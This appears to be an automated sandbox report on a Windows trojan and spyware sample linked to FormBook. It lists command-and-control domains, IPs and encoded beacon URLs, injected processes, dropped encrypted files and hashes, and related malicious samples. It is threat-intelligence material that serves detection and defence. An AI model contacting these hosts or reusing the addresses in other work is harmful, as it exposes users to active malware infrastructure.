            p4LNUqyKZM.exe37%VirustotalBrowse
            p4LNUqyKZM.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            aflaksokna.com0%VirustotalBrowse
            d55dg.top0%VirustotalBrowse
            www.asian-massage-us.xyz1%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            www.myim.cloud0%VirustotalBrowse
            www.d55dg.top1%VirustotalBrowse
            www.aflaksokna.com0%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            www.esistiliya.online0%VirustotalBrowse
            www.arlon-commerce.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp0%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/0%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzp0%Avira URL Cloudsafe
            http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiL0%Avira URL Cloudsafe
            http://www.dfbio.net0%Avira URL Cloudsafe
            http://www.dfbio.net/yzen/0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/0%Avira URL Cloudsafe
            http://www70.clientebradesco.online/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.clientebradesco.online/xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg=0%Avira URL Cloudsafe
            http://www.fineg.online/mkan/0%Avira URL Cloudsafe
            http://www70.clientebradesco.online/3%VirustotalBrowse
            http://www.myim.cloud/12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzp0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/1%VirustotalBrowse
            http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJ0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU=0%Avira URL Cloudsafe
            http://www.myim.cloud/12ts/0%Avira URL Cloudsafe
            http://www.fineg.online/mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzp0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://www.omexai.info/45sz/0%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/p6o9/0%Avira URL Cloudsafe
            http://www.myim.cloud/12ts/1%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.qiluqiyuan.buzz/p6o9/1%VirustotalBrowse
            http://www.d55dg.top/ftud/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.clientebradesco.online
            		45.33.2.79
            		truefalse
              		unknown
              aflaksokna.com
              		5.144.130.52
              		truetrueunknown
              d55dg.top
              		154.23.184.240
              		truetrueunknown
              www.asian-massage-us.xyz
              		199.59.243.226
              		truetrueunknown
              www.qiluqiyuan.buzz
              		161.97.168.245
              		truetrue
                		unknown
                www.dfbio.net
                		218.247.68.184
                		truetrue
                  		unknown
                  www.fineg.online
                  		162.0.239.141
                  		truetrue
                    		unknown
                    omexai.info
                    		3.33.130.190
                    		truetrueunknown
                    www.myim.cloud
                    		199.59.243.226
                    		truetrueunknown
                    www.d55dg.top
                    		unknown
                    		unknowntrueunknown
                    www.aflaksokna.com
                    		unknown
                    		unknowntrueunknown
                    www.omexai.info
                    		unknown
                    		unknowntrueunknown
                    www.arlon-commerce.com
                    		unknown
                    		unknowntrueunknown
                    www.thriveline.online
                    		unknown
                    		unknowntrue
                      		unknown
                      www.esistiliya.online
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.asian-massage-us.xyz/kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.aflaksokna.com/ifo8/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.aflaksokna.com/ifo8/?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.dfbio.net/yzen/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.asian-massage-us.xyz/kc69/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.clientebradesco.online/xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg=false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fineg.online/mkan/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.myim.cloud/12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.d55dg.top/ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU=true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.myim.cloud/12ts/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fineg.online/mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.d55dg.top/ftud/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.omexai.info/45sz/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.qiluqiyuan.buzz/p6o9/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icochkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiLchkntfs.exe, 00000003.00000002.3536613638.0000000004E94000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.00000000033C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.dfbio.netSCsLZYqthBle.exe, 00000007.00000002.3537571964.00000000054AD000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www70.clientebradesco.online/firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpfalse
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.comchkntfs.exe, 00000003.00000002.3538097911.00000000071E0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.0000000005026000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.000000000566E000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003B9E000.00000004.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003556000.00000004.00000001.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJchkntfs.exe, 00000003.00000002.3536613638.0000000005992000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      5.144.130.52
                      		aflaksokna.comIran (ISLAMIC Republic Of)
                      		59441HOSTIRAN-NETWORKIRtrue
                      162.0.239.141
                      		www.fineg.onlineCanada
                      		22612NAMECHEAP-NETUStrue
                      218.247.68.184
                      		www.dfbio.netChina
                      		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                      199.59.243.226
                      		www.asian-massage-us.xyzUnited States
                      		395082BODIS-NJUStrue
                      154.23.184.240
                      		d55dg.topUnited States
                      		174COGENT-174UStrue
                      3.33.130.190
                      		omexai.infoUnited States
                      		8987AMAZONEXPANSIONGBtrue
                      45.33.2.79
                      		www.clientebradesco.onlineUnited States
                      		63949LINODE-APLinodeLLCUSfalse
                      161.97.168.245
                      		www.qiluqiyuan.buzzUnited States
                      		51167CONTABODEtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1503359
                      Start date and time:2024-09-03 12:44:37 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 56s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:p4LNUqyKZM.exe
                      renamed because original name is a hash value
                      Original Sample Name:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/5@12/8
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 90%
                      • Number of executed functions: 54
                      • Number of non-executed functions: 297
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 92.204.80.11
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      06:46:26API Interceptor7415661x Sleep call for process: chkntfs.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      5.144.130.52INV20240828.exeGet hashmaliciousFormBookBrowse
                      • www.aflaksokna.com/ifo8/
                      162.0.239.141INV20240828.exeGet hashmaliciousFormBookBrowse
                      • www.fineg.online/mkan/
                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                      • www.stolex.top/kunq/
                      218.247.68.184INV20240828.exeGet hashmaliciousFormBookBrowse
                      • www.dfbio.net/yzen/
                      rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                      • www.dfbio.net/a3cb/
                      199.59.243.226PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.dom-2.online/m409/
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • www.dom-2.online/m409/
                      http://cpsenrgy.comGet hashmaliciousUnknownBrowse
                      • cpsenrgy.com/_tr
                      ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                      • www.marchingnorth.shop/z97i/
                      Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                      • www.foundation-repair.biz/5l7s/
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • www.asian-massage-us.xyz/kc69/
                      Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                      • www.foundation-repair.biz/5l7s/
                      8mwXY7Lh2phgnOz.exeGet hashmaliciousFormBookBrowse
                      • www.972.studio/d16h/?8p4=Yyg0mkT9kWaBGz3P4SAFDjh7bHhcAIEcMMaswnvDe8XCEKQH+wdYsDPfbHrPjzeNnPr0&tZId=0tE43nlx
                      bintoday1.exeGet hashmaliciousFormBookBrowse
                      • www.dom-2.online/6t1p/
                      154.23.184.240PO#86637.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/edpl/
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/edpl/
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • www.d55dg.top/ftud/
                      factura-630.900.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/edpl/
                      PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/edpl/
                      AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/p39s/
                      PO#4510065525.exeGet hashmaliciousFormBookBrowse
                      • www.hm62t.top/p39s/
                      Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
                      • www.d55dg.top/w1w3/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.qiluqiyuan.buzzINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 161.97.168.245
                      AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                      • 161.97.168.245
                      PO#4510065525.exeGet hashmaliciousFormBookBrowse
                      • 161.97.168.245
                      www.myim.cloudORDER_pdf.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      www.dfbio.netINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 218.247.68.184
                      rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                      • 218.247.68.184
                      www.asian-massage-us.xyzINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      www.fineg.onlineINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 162.0.239.141
                      www.clientebradesco.onlineINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 45.33.23.183

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      HOSTIRAN-NETWORKIRDOCUMENTS.vbsGet hashmaliciousAgentTeslaBrowse
                      • 5.144.130.41
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • 5.144.130.52
                      Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                      • 5.144.130.41
                      rDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
                      • 185.83.114.124
                      rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                      • 185.83.114.124
                      Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 5.144.130.49
                      PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 5.144.130.49
                      PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 5.144.130.49
                      PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 5.144.130.35
                      NAMECHEAP-NETUShttps://dfcvgf-f42780.ingress-erytho.ewp.live/wp-content/plugins/sdnww/pages/region.phpGet hashmaliciousUnknownBrowse
                      • 63.250.43.133
                      sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                      • 162.0.238.43
                      PO 7001628119_61900PM.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.0.239.223
                      COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                      • 63.250.47.40
                      Play____Now_AUD__autoresponse.htmGet hashmaliciousHTMLPhisherBrowse
                      • 199.192.22.193
                      ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                      • 63.250.47.40
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • 162.0.239.141
                      DPPLYAD_12872 PDF.exeGet hashmaliciousFormBookBrowse
                      • 198.54.116.16
                      ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                      • 63.250.47.40
                      WEST263GO-HKWest263InternationalLimitedHKINV20240828.exeGet hashmaliciousFormBookBrowse
                      • 218.247.68.184
                      rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                      • 218.247.68.184
                      KKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                      • 103.24.254.174
                      https://mytonwallte.io/Get hashmaliciousUnknownBrowse
                      • 103.43.188.221
                      Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                      • 103.120.80.111
                      pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                      • 103.120.80.111
                      CFV20240600121.exeGet hashmaliciousFormBookBrowse
                      • 103.120.80.111
                      9wDlG5DeRK.elfGet hashmaliciousMoobotBrowse
                      • 103.108.210.142
                      PD1Afd15RS.elfGet hashmaliciousMiraiBrowse
                      • 103.24.254.161
                      BODIS-NJUSNOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      PO#86637.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      play.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      http://cpsenrgy.comGet hashmaliciousUnknownBrowse
                      • 199.59.243.226
                      ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      INV20240828.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                      • 199.59.243.226

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\Maianthemum

                      Download File
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289280
                      Entropy (8bit):7.994772609984253
                      Encrypted:true
                      SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                      MD5:9E727CACC162F14482B7C2077F0D7109
                      SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                      SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                      SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                      Malicious:false
                      Reputation:low
                      Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU

                      C:\Users\user\AppData\Local\Temp\aut5EB9.tmp

                      Download File
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289280
                      Entropy (8bit):7.994772609984253
                      Encrypted:true
                      SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                      MD5:9E727CACC162F14482B7C2077F0D7109
                      SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                      SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                      SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                      Malicious:false
                      Reputation:low
                      Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU

                      C:\Users\user\AppData\Local\Temp\aut5F08.tmp

                      Download File
                      Process:C:\Users\user\Desktop\p4LNUqyKZM.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):14502
                      Entropy (8bit):7.6194755282159985
                      Encrypted:false
                      SSDEEP:384:fKlUKTgVbU+n6BmD89zY14FrJMz8omo7LC1:fKlUKi4i1w2Q6y
                      MD5:E2A2D367E6B998962F5FCEDD000E0260
                      SHA1:89C2C43AE8EE439726FF80499057BCECB3B0EC69
                      SHA-256:D2890512351C2F74A855123B14D3494676E6F7B020342B231E4053BEABBF1BB0
